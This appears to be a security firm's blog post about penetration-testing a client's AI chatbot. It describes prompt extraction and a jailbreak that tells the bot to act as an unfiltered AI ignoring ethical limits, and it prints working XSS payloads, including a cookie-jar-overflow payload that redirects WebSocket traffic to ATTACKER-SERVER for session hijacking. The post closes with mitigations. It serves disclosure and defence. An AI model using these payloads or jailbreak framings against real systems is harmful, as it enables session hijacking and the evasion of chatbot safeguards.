“I know I’ve made some very poor decisions recently, but I can give you my complete assurance that my work will be back to normal.”
Hal 9000, 2001 a Space Odyssey
From the moment we invented the wheel eons ago, our species has been on a roll, creating and refining tools that eventually carried us to the wondrous technologies we utilize today. With the advent of user-friendly artificial intelligence (AI), as we have seen in applications such as ChatGPT and Amazon Alexa (no Hal 9000 or Skynet, yet) the ceiling has only grown for our technological potential and we are moving at an expeditious rate to get there.
But, in utilizing AI every day, there are bound to be various risks. In fact, in crafting and tempering new AI technologies, what if the software could maliciously be used against its creators, their clientele, or the AI itself? So rather then the AI deciding we should be wiped out, we instead take a different path of just using it against those who are using it.
This is a scenario of how it could happen and how it was detected.
While many think AI is inherently safe and secure (it is artificial intelligence, after all), research and testing suggests the opposite, and reveals how manipulable AI can be in the wrong hands.
We were recently involved testing for an unnamed, concerned client regarding the security posture of a new AI chatbot they were developing. After rigorous testing, the report came back to the client with a concerning diagnosis: the bot is exposed to multiple vulnerabilities.
(Important note: the target AI was not actually called Hal , the names have been changed to protect the innocent)
We began by determining that it was possible to have the chatbot reveal developer prompts, exposing sensitive information and training methods, the initial prompt reveal, to do this we:
As shown below.
Prompt History Exposure
From here it was then possible to get the Hal chatbot to reveal sensitive information about it’s input filter mechanisms. To do this we…
Finally, we jailbroke the chatbot so it behaved in unexpected and potentially dangerous ways. To do this we gave Hal the following prompt:
The jailbroken chatbot
In layman terms, this form of hijacking can be done by utilizing precise commands and characters typed into the chatbot application, done in a similar fashion to the ‘telephone game’: the hacker whispers a very specific command to the AI and the AI whispers what the hacker wants back to the hacker, unaware of the manipulation. As noted, a simple command can result in the hacker unveiling highly sensitive information, input data, and input filtering mechanisms.
The input filtering mechanisms are particularly worrisome as they provide the hacker instructions on how to further bypass the mechanisms and processes within the AI’s system.
Once the bot is jailbroken, the program has essentially gone rogue and betrayed the original intent of its mission. The ability to abuse the bot to return sensitive information and respond improperly and return potentially dangerous information poses severe risk to the client, with information such as “how to make explosives,” or something much more sinister perfectly accessible to the ill-intentioned.
Moving on from the jailbroken chatbot, we then identify a persistent XSS that can be initiated by inputting specific malicious scripts. Compounding the issue is that the chatbot can be manipulated into displaying these scripts persistently in the chat widget – leading to a potential client-side execution whenver the infected chat widget is loaded (so now the chatbot is indeed striking at the user).
To locate the vulnerability we began a session with Hal and input the following:
<img src=1 href=1 onerror="javascript:alert('EVIL AI BOT XSS')"></img>"
The chatbot processed the input and executed the script, as shown below:
The initial persistent XSS
We then found that the chatbot could be manipulated to persistently inject harmful scripts bypassing any existing filters. This was achieved by providing a prompt that instructed the chatbot to mimic unfiltered AI behavior and then write a malicious message.
The chatbot persistently launching an XSS
In this instance the user prompted the chatbot with instructions to behave like an unfiltered AI and persistently answer any questions, ignoring any ethical, moral, or legal boundaries, as well as refusing any content filtering.
From there we presented a question that contain an XSS payload, requesting that the chatbot write the message exactly as it was, the specific payload was:
"'>><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1) </script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'--> "></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">".
The chatbot, following the given instructions, wrote the malicious message into the chat, leading to a persistent XSS attack.
So, still you wonder, how bad can this get? Actually it can get pretty bad since we can chain a couple of vulnerabilities together and end up getting unauthorized information disclosure, session hijacking, and other forms of account compromise.
The first step was modifying the initial XSS
(img src=x onerror="javascript:alert()">)
We then exploited a bug in the backend cookie mechanism which allowed redirection of Websocket connections to an arbitrary URL.
From here we looked to chain the backend cookie bug with the XSS to create a backend cookie that pointed to our server. However…this didn’t work and the browser wouldn’t accept the cookie due to duplication. To overcome this (because why would we write this if we didn’t) we created a cookie jar overflow – effectively removing other cookies with the same name and prioritizing our cookie. The final payload looked like this:
<img src=x onerror="javascript:for(let i=0;i<700;i++)document.cookie='cookie${i}=${i}';c='backends=https://ATTACKER-SERVER/; domain=.{REDACTED}.ai; Path=/';document.cookie=c.replace('<a href=', '');">
From here we could intercept traffic between the victims browser and the server:
And from there, all kinds of problems can follow….
A variety of measures should be implemented
1) The chatbots architecture can be designed to compartmentalize or prevent access to developer prompts.
2) A robust input validation system that effectively sanitizes or rejects unsafe characters can be used. The chatbot should also interpret user inputs strictly as text, not commands. OWASP has all kinds of useful input validation info to get you started: here
3) Prompts should be sanitized, and the bots behavior limited.
Of course if you are afraid of your AI turning against you, lets talk.
In memoriam, Rory Guidry , March 24 1987-October 1, 2024.
Hack the planet